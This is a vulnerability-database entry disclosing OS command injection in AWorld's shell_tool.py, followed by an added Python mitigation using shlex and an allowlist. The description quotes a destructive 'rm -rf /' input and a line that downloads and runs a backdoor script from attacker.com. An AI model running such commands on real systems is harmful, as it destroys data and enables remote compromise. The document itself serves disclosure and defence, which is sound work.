| Field | Details |
|---|---|
| Title | inclusionAI AWorld 0.0 Command Injection |
| Description | AWorld is a tool designed for building, evaluating, and running General Multi-Agent Assistance. However, it contains a critical security vulnerability in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`.<br>The vulnerability is of type CWE-78: OS Command Injection. The code in this file uses the `subprocess.run()` and `subprocess.Popen()` functions to execute user-supplied commands, and the `shell` parameter in these calls is set to `True`.<br>In the `execute` method, when `capture_output` is `True`, `subprocess.run()` is called with `shell=True`; when `capture_output` is `False`, `subprocess.Popen()` is called with `shell=True`. Similarly, the `execute_async` method also calls `subprocess.Popen()` with `shell=True`.<br>This setting allows an attacker to inject malicious commands through user input. For instance, if an attacker supplies input like `rm -rf /` in a scenario where the application accepts user shell commands, the command will be executed by the system. In more sophisticated attacks, an attacker could inject commands to download and execute a backdoor script from a remote server, such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh`, which can lead to unauthorized access and further malicious activity.<br>More details: https://github.com/inclusionAI/AWorld/issues/38 |
| Source | https://github.com/inclusionAI/AWorld/issues/38 |
| User | ybdesire (UID 83239) |
| Submission | 16/04/2025 05:41 AM (12 months ago) |
| Moderation | 28/04/2025 07:56 AM (12 days later) |
| Status | Approved |
| VulDB Entry | 306395 [inclusionAI AWorld up to 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen privilege escalation] |
| Points | 20 |
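The mitigation the report points at, as an added example that is not AWorld's own code: parse the command string with `shlex.split()` and run it with `shell=False` behind a binary allowlist, so shell metacharacters in user input become literal arguments instead of command separators. `ALLOWED_BINARIES`, `execute()` and `is_allowed()` are hypothetical names chosen for this illustration.

```python
import shlex
import subprocess

# Hypothetical allowlist for illustration; a real deployment would tailor it.
ALLOWED_BINARIES = {"echo", "ls", "cat"}


def is_allowed(command: str) -> bool:
    """Return True only if the command parses and its binary is allowlisted."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes etc.
        return False
    return bool(argv) and argv[0] in ALLOWED_BINARIES


def execute(command: str, capture_output: bool = True,
            timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Run a user-supplied command without handing it to a shell.

    With shell=False the argv list goes straight to execve(); ';', '&&',
    '|' and '$(...)' are never interpreted, they are just argument text.
    """
    if not is_allowed(command):
        raise PermissionError(f"command not allowed: {command!r}")
    argv = shlex.split(command)
    return subprocess.run(argv, shell=False, capture_output=capture_output,
                          text=True, timeout=timeout)


if __name__ == "__main__":
    # The ';' is passed to echo as part of its arguments, not to a shell.
    print(execute("echo hello; echo injected").stdout, end="")
    print(is_allowed("rm -rf /"))            # False: binary not allowlisted
    print(is_allowed("; wget http://x/b.sh && sh b.sh"))  # False: ';' is argv[0]
```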